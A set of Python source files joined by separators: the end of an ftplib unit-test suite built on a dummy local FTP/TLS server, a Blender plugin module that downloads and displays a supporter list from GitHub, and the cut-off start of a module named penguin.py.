self.in_buffer = []
self.dtp = None
self.last_received_cmd = None
self.last_received_data = ''
self.next_response = ''
self.rest = None
self.push('220 welcome')
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = b''.join(self.in_buffer).decode('ascii')
self.in_buffer = []
if self.next_response:
self.push(self.next_response)
self.next_response = ''
cmd = line.split(' ')[0].lower()
self.last_received_cmd = cmd
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('550 command "%s" not understood.' %cmd)
def handle_error(self):
raise
def push(self, data):
asynchat.async_chat.push(self, data.encode('ascii') + b'\r\n')
def cmd_port(self, arg):
addr = list(map(int, arg.split(',')))
ip = '%d.%d.%d.%d' %tuple(addr[:4])
port = (addr[4] * 256) + addr[5]
s = socket.create_connection((ip, port), timeout=10)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_pasv(self, arg):
with socket.socket() as sock:
sock.bind((self.socket.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(10)
ip, port = sock.getsockname()[:2]
ip = ip.replace('.', ','); p1 = port / 256; p2 = port % 256
self.push('227 entering passive mode (%s,%d,%d)' %(ip, p1, p2))
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_eprt(self, arg):
af, ip, port = arg.split(arg[0])[1:-1]
port = int(port)
s = socket.create_connection((ip, port), timeout=10)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_epsv(self, arg):
with socket.socket(socket.AF_INET6) as sock:
sock.bind((self.socket.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(10)
port = sock.getsockname()[1]
self.push('229 entering extended passive mode (|||%d|)' %port)
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_noop(self, arg):
self.push('200 noop ok')
def cmd_user(self, arg):
self.push('331 username ok')
def cmd_pass(self, arg):
self.push('230 password ok')
def cmd_acct(self, arg):
self.push('230 acct ok')
def cmd_rnfr(self, arg):
self.push('350 rnfr ok')
def cmd_rnto(self, arg):
self.push('250 rnto ok')
def cmd_dele(self, arg):
self.push('250 dele ok')
def cmd_cwd(self, arg):
self.push('250 cwd ok')
def cmd_size(self, arg):
self.push('250 1000')
def cmd_mkd(self, arg):
self.push('257 "%s"' %arg)
def cmd_rmd(self, arg):
self.push('250 rmd ok')
def cmd_pwd(self, arg):
self.push('257 "pwd ok"')
def cmd_type(self, arg):
self.push('200 type ok')
def cmd_quit(self, arg):
self.push('221 quit ok')
self.close()
def cmd_stor(self, arg):
self.push('125 stor ok')
def cmd_rest(self, arg):
self.rest = arg
self.push('350 rest ok')
def cmd_retr(self, arg):
self.push('125 retr ok')
if self.rest is not None:
offset = int(self.rest)
else:
offset = 0
self.dtp.push(RETR_DATA[offset:])
self.dtp.close_when_done()
self.rest = None
def cmd_list(self, arg):
self.push('125 list ok')
self.dtp.push(LIST_DATA)
self.dtp.close_when_done()
def cmd_nlst(self, arg):
self.push('125 nlst ok')
self.dtp.push(NLST_DATA)
self.dtp.close_when_done()
class DummyFTPServer(asyncore.dispatcher, threading.Thread):
handler = DummyFTPHandler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise
if ssl is not None:
CERTFILE = os.path.join(os.path.dirname(__file__), "keycert.pem")
class SSLConnection(asyncore.dispatcher):
"""An asyncore.dispatcher subclass supporting TLS/SSL."""
_ssl_accepting = False
_ssl_closing = False
def secure_connection(self):
self.del_channel()
socket = ssl.wrap_socket(self.socket, suppress_ragged_eofs=False,
certfile=CERTFILE, server_side=True,
do_handshake_on_connect=False,
ssl_version=ssl.PROTOCOL_SSLv23)
self.set_socket(socket)
self._ssl_accepting = True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
raise
except socket.error as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def _do_ssl_shutdown(self):
self._ssl_closing = True
try:
self.socket = self.socket.unwrap()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
except socket.error as err:
# Any "socket error" corresponds to a SSL_ERROR_SYSCALL return
# from OpenSSL's SSL_shutdown(), corresponding to a
# closed socket condition. See also:
# http://www.mail-archive.com/openssl-users@openssl.org/msg60710.html
pass
self._ssl_closing = False
super(SSLConnection, self).close()
def handle_read_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_read_event()
def handle_write_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_write_event()
def send(self, data):
try:
return super(SSLConnection, self).send(data)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN,
ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return 0
raise
def recv(self, buffer_size):
try:
return super(SSLConnection, self).recv(buffer_size)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return b''
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN):
self.handle_close()
return b''
raise
def handle_error(self):
raise
def close(self):
if (isinstance(self.socket, ssl.SSLSocket) and
self.socket._sslobj is not None):
self._do_ssl_shutdown()
else:
super(SSLConnection, self).close()
class DummyTLS_DTPHandler(SSLConnection, DummyDTPHandler):
"""A DummyDTPHandler subclass supporting TLS/SSL."""
def __init__(self, conn, baseclass):
DummyDTPHandler.__init__(self, conn, baseclass)
if self.baseclass.secure_data_channel:
self.secure_connection()
class DummyTLS_FTPHandler(SSLConnection, DummyFTPHandler):
"""A DummyFTPHandler subclass supporting TLS/SSL."""
dtp_handler = DummyTLS_DTPHandler
def __init__(self, conn):
DummyFTPHandler.__init__(self, conn)
self.secure_data_channel = False
def cmd_auth(self, line):
"""Set up secure control channel."""
self.push('234 AUTH TLS successful')
self.secure_connection()
def cmd_pbsz(self, line):
"""Negotiate size of buffer for secure data transfer.
For TLS/SSL the only valid value for the parameter is '0'.
Any other value is accepted but ignored.
"""
self.push('200 PBSZ=0 successful.')
def cmd_prot(self, line):
"""Setup un/secure data channel."""
arg = line.upper()
if arg == 'C':
self.push('200 Protection set to Clear')
self.secure_data_channel = False
elif arg == 'P':
self.push('200 Protection set to Private')
self.secure_data_channel = True
else:
self.push("502 Unrecognized PROT type (use C or P).")
class DummyTLS_FTPServer(DummyFTPServer):
handler = DummyTLS_FTPHandler
class TestFTPClass(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP(timeout=10)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(), '220 welcome')
def test_sanitize(self):
self.assertEqual(self.client.sanitize('foo'), repr('foo'))
self.assertEqual(self.client.sanitize('pass 12345'), repr('pass *****'))
self.assertEqual(self.client.sanitize('PASS 12345'), repr('PASS *****'))
def test_exceptions(self):
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 400')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 499')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 500')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 599')
self.assertRaises(ftplib.error_proto, self.client.sendcmd, 'echo 999')
def test_all_errors(self):
exceptions = (ftplib.error_reply, ftplib.error_temp, ftplib.error_perm,
ftplib.error_proto, ftplib.Error, IOError, EOFError)
for x in exceptions:
try:
raise x('exception not included in all_errors set')
except ftplib.all_errors:
pass
def test_set_pasv(self):
# passive mode is supposed to be enabled by default
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(True)
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(False)
self.assertFalse(self.client.passiveserver)
def test_voidcmd(self):
self.client.voidcmd('echo 200')
self.client.voidcmd('echo 299')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 199')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 300')
def test_login(self):
self.client.login()
def test_acct(self):
self.client.acct('passwd')
def test_rename(self):
self.client.rename('a', 'b')
self.server.handler_instance.next_response = '200'
self.assertRaises(ftplib.error_reply, self.client.rename, 'a', 'b')
def test_delete(self):
self.client.delete('foo')
self.server.handler_instance.next_response = '199'
self.assertRaises(ftplib.error_reply, self.client.delete, 'foo')
def test_size(self):
self.client.size('foo')
def test_mkd(self):
dir = self.client.mkd('/foo')
self.assertEqual(dir, '/foo')
def test_rmd(self):
self.client.rmd('foo')
def test_pwd(self):
dir = self.client.pwd()
self.assertEqual(dir, 'pwd ok')
def test_quit(self):
self.assertEqual(self.client.quit(), '221 quit ok')
# Ensure the connection gets closed; sock attribute should be None
self.assertEqual(self.client.sock, None)
def test_retrbinary(self):
def callback(data):
received.append(data.decode('ascii'))
received = []
self.client.retrbinary('retr', callback)
self.assertEqual(''.join(received), RETR_DATA)
def test_retrbinary_rest(self):
def callback(data):
received.append(data.decode('ascii'))
for rest in (0, 10, 20):
received = []
self.client.retrbinary('retr', callback, rest=rest)
self.assertEqual(''.join(received), RETR_DATA[rest:],
msg='rest test case %d %d %d' % (rest,
len(''.join(received)),
len(RETR_DATA[rest:])))
def test_retrlines(self):
received = []
self.client.retrlines('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA.replace('\r\n', ''))
def test_storbinary(self):
f = io.BytesIO(RETR_DATA.encode('ascii'))
self.client.storbinary('stor', f)
self.assertEqual(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storbinary('stor', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_storbinary_rest(self):
f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
for r in (30, '30'):
f.seek(0)
self.client.storbinary('stor', f, rest=r)
self.assertEqual(self.server.handler_instance.rest, str(r))
def test_storlines(self):
f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
self.client.storlines('stor', f)
self.assertEqual(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storlines('stor foo', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_nlst(self):
self.client.nlst()
self.assertEqual(self.client.nlst(), NLST_DATA.split('\r\n')[:-1])
def test_dir(self):
l = []
self.client.dir(lambda x: l.append(x))
self.assertEqual(''.join(l), LIST_DATA.replace('\r\n', ''))
def test_makeport(self):
with self.client.makeport():
# IPv4 is in use, just make sure send_eprt has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd,
'port')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), 10)
conn.close()
# IPv4 is in use, just make sure send_epsv has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd, 'pasv')
def test_with_statement(self):
self.client.quit()
def is_client_connected():
if self.client.sock is None:
return False
try:
self.client.sendcmd('noop')
except (socket.error, EOFError):
return False
return True
# base test
with ftplib.FTP(timeout=10) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.assertTrue(is_client_connected())
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# QUIT sent inside the with block
with ftplib.FTP(timeout=10) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.client.quit()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# force a wrong response code to be sent on QUIT: error_perm
# is expected and the connection is supposed to be closed
try:
with ftplib.FTP(timeout=10) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.server.handler_instance.next_response = '550 error on quit'
except ftplib.error_perm as err:
self.assertEqual(str(err), '550 error on quit')
else:
self.fail('Exception not raised')
# needed to give the threaded server some time to set the attribute
# which otherwise would still be == 'noop'
time.sleep(0.1)
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
def test_parse257(self):
self.assertEqual(ftplib.parse257('257 "/foo/bar"'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 "/foo/bar" created'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 ""'), '')
self.assertEqual(ftplib.parse257('257 "" created'), '')
self.assertRaises(ftplib.error_reply, ftplib.parse257, '250 "/foo/bar"')
# The 257 response is supposed to include the directory
# name and in case it contains embedded double-quotes
# they must be doubled (see RFC-959, chapter 7, appendix 2).
self.assertEqual(ftplib.parse257('257 "/foo/b""ar"'), '/foo/b"ar')
self.assertEqual(ftplib.parse257('257 "/foo/b""ar" created'), '/foo/b"ar')
class TestIPv6Environment(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0), af=socket.AF_INET6)
self.server.start()
self.client = ftplib.FTP()
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_af(self):
self.assertEqual(self.client.af, socket.AF_INET6)
def test_makeport(self):
with self.client.makeport():
self.assertEqual(self.server.handler_instance.last_received_cmd,
'eprt')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), 10)
conn.close()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'epsv')
def test_transfer(self):
def retr():
def callback(data):
received.append(data.decode('ascii'))
received = []
self.client.retrbinary('retr', callback)
self.assertEqual(''.join(received), RETR_DATA)
self.client.set_pasv(True)
retr()
self.client.set_pasv(False)
retr()
class TestTLS_FTPClassMixin(TestFTPClass):
"""Repeat TestFTPClass tests starting the TLS layer for both control
and data connections first.
"""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=10)
self.client.connect(self.server.host, self.server.port)
# enable TLS
self.client.auth()
self.client.prot_p()
class TestTLS_FTPClass(TestCase):
"""Specific TLS_FTP class tests."""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=10)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_control_connection(self):
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
def test_data_connection(self):
# clear text
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# secured, after PROT P
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# PROT C is issued, the connection must be in cleartext again
self.client.prot_c()
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), "226 transfer complete")
def test_login(self):
# login() is supposed to implicitly secure the control connection
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.login()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
# make sure that AUTH TLS doesn't get issued again
self.client.login()
def test_auth_issued_twice(self):
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
def test_auth_ssl(self):
try:
self.client.ssl_version = ssl.PROTOCOL_SSLv3
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
finally:
self.client.ssl_version = ssl.PROTOCOL_TLSv1
def test_context(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(ValueError, ftplib.FTP_TLS, keyfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
keyfile=CERTFILE, context=ctx)
self.client = ftplib.FTP_TLS(context=ctx, timeout=10)
self.client.connect(self.server.host, self.server.port)
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIs(self.client.sock.context, ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIs(sock.context, ctx)
self.assertIsInstance(sock, ssl.SSLSocket)
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(3)
self.port = support.bind_port(self.sock)
threading.Thread(target=self.server, args=(self.evt,self.sock)).start()
# Wait for the server to be ready.
self.evt.wait()
self.evt.clear()
ftplib.FTP.port = self.port
def tearDown(self):
self.evt.wait()
self.sock.close()
def server(self, evt, serv):
# This method sets the evt 3 times:
# 1) when the connection is ready to be accepted.
# 2) when it is safe for the caller to close the connection
# 3) when we have closed the socket
serv.listen(5)
# (1) Signal the caller that we are ready to accept the connection.
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
conn.send(b"1 Hola mundo\n")
# (2) Signal the caller that it is safe to close the socket.
evt.set()
conn.close()
finally:
serv.close()
# (3) Signal the caller that we are done.
evt.set()
def testTimeoutDefault(self):
# default -- use global socket timeout
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP("localhost")
finally:
socket.setdefaulttimeout(None)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutNone(self):
# no timeout -- do not use global socket timeout
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP("localhost", timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(ftp.sock.gettimeout() is None)
self.evt.wait()
ftp.close()
def testTimeoutValue(self):
# a value
ftp = ftplib.FTP(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutConnect(self):
ftp = ftplib.FTP()
ftp.connect(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDifferentOrder(self):
ftp = ftplib.FTP(timeout=30)
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDirectAccess(self):
ftp = ftplib.FTP()
ftp.timeout = 30
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def test_main():
tests = [TestFTPClass, TestTimeouts]
if socket.has_ipv6:
try:
DummyFTPServer((HOST, 0), af=socket.AF_INET6)
except socket.error:
pass
else:
tests.append(TestIPv6Environment)
if ssl is not None:
tests.extend([TestTLS_FTPClassMixin, TestTLS_FTPClass])
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
supporter.py
|
# MIT License
# Copyright (c) 2017 GiveMeAllYourCats
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the 'Software'), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Code author: Hotox
# Repo: https://github.com/michaeldegroot/cats-blender-plugin
# Edits by: GiveMeAllYourCats
import os
import bpy
import bpy.utils.previews
import json
import shutil
import pathlib
import zipfile
import webbrowser
import json.decoder
import urllib.error
import urllib.request
import tools.settings
from threading import Thread
from datetime import datetime, timezone
# global variables
preview_collections = {}
supporter_data = None
reloading = False
button_list = []
last_update = None
time_format = "%Y-%m-%d %H:%M:%S"
time_format_github = "%Y-%m-%dT%H:%M:%SZ"
main_dir = pathlib.Path(os.path.dirname(__file__)).parent.resolve()
resources_dir = os.path.join(str(main_dir), "resources")
class PatreonButton(bpy.types.Operator):
bl_idname = 'supporter.patreon'
bl_label = 'Become a Patron'
def execute(self, context):
webbrowser.open('https://www.patreon.com/catsblenderplugin')
self.report({'INFO'}, 'Patreon page opened')
return {'FINISHED'}
class ReloadButton(bpy.types.Operator):
bl_idname = 'supporter.reload'
bl_label = 'Reload List'
bl_description = 'Reloads the supporter list'
@classmethod
def poll(cls, context):
return not reloading
def execute(self, context):
global reloading
reloading = True
thread = Thread(target=download_file, args=[])
thread.start()
return {'FINISHED'}
class DynamicPatronButton(bpy.types.Operator):
bl_idname = 'support.dynamic_patron_button'
bl_label = 'Supporter Name'
bl_description = 'This is an awesome supporter'
website = None
def execute(self, context):
if self.website:
webbrowser.open(self.website)
return {'FINISHED'}
def register_dynamic_buttons():
if not supporter_data:
return
temp_idnames = []
for supporter in supporter_data.get('supporters'):
if supporter.get('disabled'):
continue
name = supporter.get('displayname')
idname = 'support.' + ''.join(filter(str.isalpha, name.lower()))
description = name + ' is an awesome supporter'
if supporter.get('description'):
# description = name + ' says:\n\n' + supporter.get('description') + '\n'
description = supporter.get('description')
website = None
if supporter.get('website'):
website = supporter.get('website')
while idname in temp_idnames:
idname += '2'
button = type('DynOp_' + name, (DynamicPatronButton, ),
{'bl_idname': idname,
'bl_label': name,
'bl_description': description,
'website': website
})
button_list.append(button)
supporter['idname'] = idname
temp_idnames.append(idname)
bpy.utils.register_class(button)
def unregister_dynamic_buttons():
for button in button_list:
try:
bpy.utils.unregister_class(button)
except RuntimeError:
pass
button_list.clear()
def download_file():
# Load all the directories and files
downloads_dir = os.path.join(resources_dir, "downloads")
extracted_zip_dir = os.path.join(downloads_dir, "cats_supporter_list-master")
icons_dir = os.path.join(resources_dir, "icons")
icons_supporter_dir = os.path.join(icons_dir, "supporters")
supporter_zip_file = os.path.join(downloads_dir, "cats_supporter_list.zip")
supporter_list_file = os.path.join(resources_dir, "supporters.json")
extracted_supporter_list_file = os.path.join(extracted_zip_dir, "supporters.json")
extracted_icons_dir = os.path.join(extracted_zip_dir, "supporters")
# Create download folder
pathlib.Path(downloads_dir).mkdir(exist_ok=True)
# Download zip
print('DOWNLOAD FILE')
try:
urllib.request.urlretrieve("https://github.com/Darkblader24/cats_supporter_list/archive/master.zip", supporter_zip_file)
except urllib.error.URLError:
print("FILE COULD NOT BE DOWNLOADED")
shutil.rmtree(downloads_dir)
finish_reloading()
return
print('DOWNLOAD FINISHED')
# If zip is not downloaded, abort
if not os.path.isfile(supporter_zip_file):
print("ZIP NOT FOUND!")
shutil.rmtree(downloads_dir)
finish_reloading()
return
# Extract the downloaded zip
print('EXTRACTING ZIP')
with zipfile.ZipFile(supporter_zip_file, "r") as zip_ref:
zip_ref.extractall(downloads_dir)
print('EXTRACTED')
# If zip is not extracted, abort
if not os.path.isdir(extracted_zip_dir):
print("EXTRACTED ZIP FOLDER NOT FOUND!")
shutil.rmtree(downloads_dir)
finish_reloading()
return
# delete existing supporter list and icon folder
if os.path.isfile(supporter_list_file):
print("REMOVED SUPPORT LIST")
os.remove(supporter_list_file)
if os.path.isdir(icons_supporter_dir):
print("REMOVED ICON DIR")
shutil.rmtree(icons_supporter_dir)
# Move the extracted files to their correct places
shutil.move(extracted_supporter_list_file, supporter_list_file)
shutil.move(extracted_icons_dir, icons_dir)
# Delete download folder
shutil.rmtree(downloads_dir)
# Save update time in settings
tools.settings.set_last_supporter_update(last_update)
# Reload supporters
reload_supporters()
def readJson():
supporters_file = os.path.join(resources_dir, "supporters.json")
print('READING FILE')
if not os.path.isfile(supporters_file):
print("SUPPORTER LIST FILE NOT FOUND!")
return
print("SUPPORTER LIST FILE FOUND!")
try:
with open(supporters_file, encoding="utf8") as f:
data = json.load(f)
except json.decoder.JSONDecodeError:
return
global supporter_data
supporter_data = data
def load_supporters():
# Check for update
global reloading
reloading = True
thread = Thread(target=check_for_update, args=[])
thread.start()
# Read existing supporter list
readJson()
# Note that preview collections returned by bpy.utils.previews
# are regular py objects - you can use them to store custom data.
pcoll = bpy.utils.previews.new()
# load the supporters and news icons
load_icons(pcoll)
if preview_collections.get('supporter_icons'):
bpy.utils.previews.remove(preview_collections['supporter_icons'])
preview_collections['supporter_icons'] = pcoll
def reload_supporters():
# Read the support file
readJson()
# Get existing preview collection or create new one
if preview_collections.get('supporter_icons'):
pcoll = preview_collections['supporter_icons']
else:
pcoll = bpy.utils.previews.new()
# load the supporters and news icons
load_icons(pcoll)
if not preview_collections.get('supporter_icons'):
preview_collections['supporter_icons'] = pcoll
unregister_dynamic_buttons()
register_dynamic_buttons()
# Finish reloading
finish_reloading()
def load_icons(pcoll):
# path to the folder where the icon is
# the path is calculated relative to this py file inside the addon folder
icons_dir = os.path.join(resources_dir, "icons")
icons_supporter_dir = os.path.join(icons_dir, "supporters")
if supporter_data:
for supporter in supporter_data['supporters']:
if supporter.get('disabled'):
continue
name = supporter['displayname']
iconname = supporter.get('iconname')
if not iconname:
iconname = name
if name in pcoll:
continue
try:
pcoll.load(name, os.path.join(icons_supporter_dir, iconname + '.png'), 'IMAGE')
except KeyError:
pass
for news in supporter_data['news']:
custom_icon = news.get('custom_icon')
if news.get('disabled') or not news.get('info') or not custom_icon or custom_icon in pcoll:
continue
try:
pcoll.load(custom_icon, os.path.join(icons_supporter_dir, custom_icon + '.png'), 'IMAGE')
except KeyError:
pass
def finish_reloading():
# Set running false
global reloading
reloading = False
# Refresh ui because of async running
ui_refresh()
def load_other_icons():
# Note that preview collections returned by bpy.utils.previews
# are regular py objects - you can use them to store custom data.
pcoll = bpy.utils.previews.new()
# path to the folder where the icon is
# the path is calculated relative to this py file inside the addon folder
icons_dir = os.path.join(resources_dir, "icons")
icons_other_dir = os.path.join(icons_dir, "other")
# load a preview thumbnail of a file and store in the previews collection
pcoll.load('heart1', os.path.join(icons_other_dir, 'heart1.png'), 'IMAGE')
pcoll.load('discord1', os.path.join(icons_other_dir, 'discord1.png'), 'IMAGE')
pcoll.load('cats1', os.path.join(icons_other_dir, 'cats1.png'), 'IMAGE')
pcoll.load('empty', os.path.join(icons_other_dir, 'empty.png'), 'IMAGE')
pcoll.load('UP_ARROW', os.path.join(icons_other_dir, 'blender_up_arrow.png'), 'IMAGE')
# pcoll.load('TRANSLATE', os.path.join(icons_other_dir, 'translate.png'), 'IMAGE')
preview_collections['custom_icons'] = pcoll
def unload_icons():
print('UNLOADING ICONS!')
for pcoll in preview_collections.values():
bpy.utils.previews.remove(pcoll)
preview_collections.clear()
print('DONE!')
def ui_refresh():
# A way to refresh the ui
if bpy.data.window_managers:
for windowManager in bpy.data.window_managers:
for window in windowManager.windows:
for area in window.screen.areas:
area.tag_redraw()
def check_for_update():
if update_needed():
download_file()
else:
finish_reloading()
def update_needed():
print('CHECK UPDATE')
try:
with urllib.request.urlopen("https://api.github.com/repos/Darkblader24/cats_supporter_list/commits/master") as url:
data = json.loads(url.read().decode())
except urllib.error.URLError:
print('URL ERROR')
return False
try:
last_commit_date = datetime.strptime(data['commit']['author']['date'], time_format_github)
except KeyError:
print('DATA NOT READABLE')
return False
global last_update
commit_date_str = last_commit_date.strftime(time_format)
last_update = commit_date_str
print(last_update)
if not tools.settings.get_last_supporter_update():
print('SETTINGS NOT FOUND')
return True
last_update_str = tools.settings.get_last_supporter_update()
if commit_date_str == last_update_str:
print('COMMIT IDENTICAL')
return False
utc_now = datetime.strptime(datetime.now(timezone.utc).strftime(time_format), time_format)
time_delta = abs((utc_now - last_commit_date).seconds)
print(utc_now)
print(time_delta)
if time_delta <= 120:
print('COMMIT TOO CLOSE')
return False
print('UPDATE NEEDED')
return True
|
penguin.py
|
# TODO: Internet connectivity speed benchmark
# TODO: Docs
import ast
import os
import shutil
import threading
import time
from PIL import Image
from selenium.webdriver import Chrome
from selenium.webdriver.chrome.options import Options
COMPRESSED_COLOR_SPACE = 262144 # 64 ** 3
STATIC_RESOURCE_PATH = 'static'
# TODO: PROCESSED_DATA_PATH = 'data'
class Penguin:
